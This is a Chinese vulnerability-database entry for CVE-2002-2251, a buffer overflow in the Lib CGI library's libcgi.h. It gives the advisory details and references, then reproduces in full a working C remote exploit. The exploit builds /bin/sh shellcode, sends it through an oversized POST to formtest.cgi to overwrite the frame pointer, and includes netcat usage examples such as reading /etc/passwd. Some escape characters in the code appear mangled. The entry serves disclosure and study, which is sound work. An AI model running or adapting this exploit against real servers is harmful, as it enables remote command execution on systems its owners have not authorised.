Lib CGI Include缓冲区溢出漏洞

漏洞ID	1107117	漏洞类型	缓冲区溢出
发布时间	2002-11-27	更新时间	2002-12-31
CVE编号	CVE-2002-2251	CNNVD-ID	CNNVD-200212-482
漏洞平台	Unix	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/22049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-482

|漏洞详情

MarcosLuizOnistoLibCGI0.1版本的libcgi.h中changevalue函数存在缓冲区溢出漏洞。远程攻击者借助超长参数执行任意代码。

|漏洞EXP

source: http://www.securityfocus.com/bid/6264/info

Lib CGI is a freely available, open source CGI library for C programmers. It is available for Unix and Linux operating systems.

It has been reported that a buffer overflow exists in the Lib CGI development library. Due to improper bounds checking in an include file, programs making use of this include, or programs linked against libraries using this include could be vulnerable to a remote buffer overflow attack. This could result in an attacker gaining remote access with the privileges of the web server process.

/*
**
** Remote Frame Pointer Overwrite LIB CGI in Language C exploit
**                          by Xpl017Elz in INetCop(c) Security
**
** __
** Proof of concept:
**
** bash$ (./0x82-libCGIfpxpl;cat)|nc 0 80
** HTTP/1.1 200 OK
** Date: Sat, 23 Nov 2002 18:41:14 GMT
** Server: Apache/1.3.26 (Unix) PHP/4.1.2
** Connection: close
** Content-Type: text/html
**
** <html>
** <head>
** <title>LIB CGI in Language C - Testing "libcgi.h" with Url Encoding -
** by Marcos Luiz Onisto , [email protected]</title>
** ...
** 8282828282828282828282828282828282828282828282828282 ...
** ...
**
** Happy Exploit !
**
** Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=99(nobody)
**
** __
** exploit by "you dong-h0un"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <stdio.h>
#include <getopt.h>

#define Xpl017Elz x82
#define BUFSIZE 1024
#define DCOMM "printf "\n\n\nHappy Exploit !\n\n";uname -a;id"

void banrl();
int main(argc,argv)
    int argc;
    char *argv[];
{
#define NOPSH 0xbffffc20
    unsigned long nopsh=NOPSH;
#define SHADR 0xbffffd60
    unsigned long shadr=SHADR;
    int whtp;
#define NULLS 0x00000000
    int num_0,num_1,num_2,num_3;
    int num_4,num_5;

    char input_code[]= /* It's true ! */
	"NAME=Xpl017Elz&[email protected]&HOME=http://x82.inetcop.org&SEL=Music&CHECK=yes&RADIO=very+happy&COMMENTS=";
    char send_code[]=
	"&Submit=Sendn"; /* send */
#define COMMS 235
    char shc0mm[COMMS]=DCOMM;
    unsigned char x0x[BUFSIZE];
    char x0x2[BUFSIZE];

    int x0x_0_num=NULLS;
    int x0x_1_num=NULLS;
    num_5=num_4=num_3=num_2=num_1=num_0=NULLS;

    memset(x0x,0x00,BUFSIZE);
    memset(x0x2,0x00,BUFSIZE);

    while((whtp=getopt(argc,argv,"C:c:S:s:A:a:"))!=EOF)
    {
	switch(whtp)
	{
	    case 'C':
	    case 'c':
		if(strlen(optarg)>COMMS)
		{
		    fprintf(stderr,"n [-] String Error :-(nn");
		    exit(-1);
		}
		memset(shc0mm,0x00,COMMS);
		strncpy(shc0mm,optarg,COMMS);
		break;

	    case 'S':
	    case 's':
		nopsh=strtoul(optarg,NULL,0);
		break;

	    case 'A':
	    case 'a':
		shadr=strtoul(optarg,NULL,0);
		break;

	    case '?':
		{
		    (void)banrl();
		    fprintf(stderr,"n Usage: %s -opt argsn",argv[0]);
		    fprintf(stderr,"nt-s [addr] - shellcode");
		    fprintf(stderr,"nt-a [addr] - &shellcode");
		    fprintf(stderr,"nt-c [cmd]  - commandn");
		    fprintf(stderr,"n Example: %s -s %p -a %p -c 'cat /etc/passwd'nn",argv[0],nopsh,shadr);
		    exit(0);
		}
		break;
	}
    }

    //--- make shellcode :-) ---//
    /* This is dong-h0un U style */
    num_1=strlen(shc0mm)+0x0c; num_2=num_1+0x01;
    num_3=num_2+0x04; num_4=num_3+0x04; num_5=num_4+0x04;
    x0x[num_0++]=0xeb; x0x[num_0++]=0x30; x0x[num_0++]=0x5e;
    x0x[num_0++]=0x89; x0x[num_0++]=0x76; x0x[num_0++]=num_2;
    x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0x88;
    x0x[num_0++]=0x46; x0x[num_0++]=0x08; x0x[num_0++]=0x88;
    x0x[num_0++]=0x46; x0x[num_0++]=0x0b; x0x[num_0++]=0x88;
    x0x[num_0++]=0x46; x0x[num_0++]=num_1;x0x[num_0++]=0x89;
    x0x[num_0++]=0x46; x0x[num_0++]=num_5;x0x[num_0++]=0xb0;
    x0x[num_0++]=0x0b; x0x[num_0++]=0x8d; x0x[num_0++]=0x5e;
    x0x[num_0++]=0x09; x0x[num_0++]=0x89; x0x[num_0++]=0x5e;
    x0x[num_0++]=num_3;x0x[num_0++]=0x8d; x0x[num_0++]=0x5e;
    x0x[num_0++]=0x0c; x0x[num_0++]=0x89; x0x[num_0++]=0x5e;
    x0x[num_0++]=num_4;x0x[num_0++]=0x89; x0x[num_0++]=0xf3;
    x0x[num_0++]=0x8d; x0x[num_0++]=0x4e; x0x[num_0++]=num_2;
    x0x[num_0++]=0x8d; x0x[num_0++]=0x56; x0x[num_0++]=num_5;
    x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0x31;
    x0x[num_0++]=0xc0; x0x[num_0++]=0xb0; x0x[num_0++]=0x01;
    x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0xe8;
    x0x[num_0++]=0xcb; x0x[num_0++]=0xff; x0x[num_0++]=0xff;
    x0x[num_0++]=0xff; x0x[num_0++]=0x2f; x0x[num_0++]=0x2f;
    x0x[num_0++]=0x62; x0x[num_0++]=0x69; x0x[num_0++]=0x6e;
    x0x[num_0++]=0x2f; x0x[num_0++]=0x73; x0x[num_0++]=0x68;
    x0x[num_0++]=0x20; x0x[num_0++]=0x2d; x0x[num_0++]=0x63;
    x0x[num_0++]=0x20;

    //--- execute formtest.cgi ---//
    fprintf(stdout,"POST /cgi-bin/formtest.cgi HTTP/1.0n");
    fprintf(stdout,"Connection: closen");
    fprintf(stdout,"User-Agent: ");

    //--- put shellcode ---//
    for(x0x_0_num=0;x0x_0_num<BUFSIZE/2-strlen(x0x)-strlen(shc0mm);x0x_0_num++)
	fprintf(stdout,"x90");
    fprintf(stdout,"%s",x0x);
    fprintf(stdout,"%s",shc0mm);

    //--- put &shellcode ---//
    memset(x0x,0x00,BUFSIZE);
    for(x0x_0_num=0;x0x_0_num<BUFSIZE/4;x0x_0_num+=4)
	*(long*)&x0x[x0x_0_num]=nopsh;
    fprintf(stdout,"%sn",x0x); /* &shellcode */

    //--- set type ---//
    fprintf(stdout,"Host: x82 was here.n");
    fprintf(stdout,"Content-type: application/x-www-form-urlencodedn");

    //--- put &(&shellcode) ---//
    memset(x0x,0x00,BUFSIZE);
    for(x0x_0_num=0;x0x_0_num<260;x0x_0_num+=4)
	*(long*)&x0x[x0x_0_num]=shadr; /* &(&shellcode) */
    snprintf(x0x2,BUFSIZE,"%s%s%s",input_code,x0x,send_code);

    //--- size, code send ---//
    fprintf(stdout,"Content-length: %dnn",strlen(x0x2));
    fprintf(stdout,"%sn",x0x2);

    /*******************************************************************
      How to exploit?

      Use netcat !
      bash$ (./0x82-libCGIfpxpl;cat)|nc 0 80

      This is frame pointer overwrite.
      Must investigate all shellcode address and &shellcode address.
      [nop] [shellcode] [&shellcode]
                 ^          | ^
                 |          | |
                 +----------+ +------* (-a option).
                 (-s option)

      ex) 0x82828282: 0x90909090 0x90909090 0x90909090 0x90909090
              ...         ...        ...        ...        ...
          0x8282bab0: 0x82828282 0x82828282 0x82828282 0x82828282

      It may be work that is very interesting. :-)
      bash$ (./0x82-libCGIfpxpl -s 0x82828282 -a 0x8282bab0;cat)|nc 0 80

      Only, code may create instruction that you want.
      Shellcode does not worry. (-c option)
      bash$ (./0x82-libCGIfpxpl -c "echo 'x82 was here.';";cat)|nc 0 80

      ******************************************************************/

}

void banrl()
{
    fprintf(stdout,"n Remote Frame Pointer Overwrite LIB CGI in Language C exploit");
    fprintf(stdout,"n                          by Xpl017Elz in INetCop(c) Securityn");
}

|参考资料

来源:XF
名称:libcgi-libcgih-changevalue-bo(10715)
链接:http://xforce.iss.net/xforce/xfdb/10715
来源:BID
名称:6264
链接:http://www.securityfocus.com/bid/6264
来源:BUGTRAQ
名称:20021127RemoteFramePointerOverwritevulnerabilityinLIBCGIinLanguageC.
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0330.html

相关推荐: Check Point Firewall-1 Internal Address Leakage Vulnerability

Check Point Firewall-1 Internal Address Leakage Vulnerability 漏洞ID 1104283 漏洞类型 Design Error 发布时间 2000-03-11 更新时间 2000-03-11 CVE编号…

文章版权归作者所有，未经允许请勿转载。

THE END